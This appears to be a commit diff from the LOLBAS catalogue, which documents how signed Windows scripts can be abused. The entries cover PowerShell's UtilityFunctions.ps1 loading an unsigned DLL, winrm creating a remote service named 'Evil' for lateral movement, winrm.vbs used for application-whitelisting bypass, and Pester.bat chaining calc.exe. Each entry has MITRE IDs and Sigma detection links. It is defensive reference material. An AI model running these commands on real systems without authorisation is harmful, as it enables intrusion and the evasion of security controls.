- Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()'
- Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"'
Description: Proxy execute Managed DLL with PowerShell
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well)
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Full_Path:
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
Code_Sample:

16
yml/OSScripts/Winrm.yml
View File

@ -10,21 +10,21 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10
- Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
OperatingSystem: Windows 10, Windows 11
- Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
Usecase: Proxy execution
Category: Execute
Privileges: User
Privileges: Admin
MitreID: T1216
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
- Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location
Usecase: Execute aribtrary, unsigned code via XSL script
Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.
Usecase: Execute arbitrary, unsigned code via XSL script
Category: AWL Bypass
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10
MitreID: T1220
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\winrm.vbs
- Path: C:\Windows\SysWOW64\winrm.vbs

13
yml/OSScripts/pester.yml
View File

@ -10,14 +10,21 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
- Command: Pester.bat ;calc.exe
Description: Execute code using Pester. Example here executes calc.exe
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10
OperatingSystem: Windows 10, Windows 11
- Command: Pester.bat ;calc.exe
Description: Execute code using Pester. Example here executes calc.exe
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
- Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
@ -26,9 +33,11 @@ Code_Sample:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_pester.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml
Resources:
- Link: https://twitter.com/Oddvarmoe/status/993383596244258816
- Link: https://twitter.com/_st0pp3r_/status/1560072680887525378
- Link: https://twitter.com/_st0pp3r_/status/1560072680887525378
Acknowledgement:
- Person: Emin Atac
Handle: '@p0w3rsh3ll'

Some files were not shown because too many files have changed in this diff Show More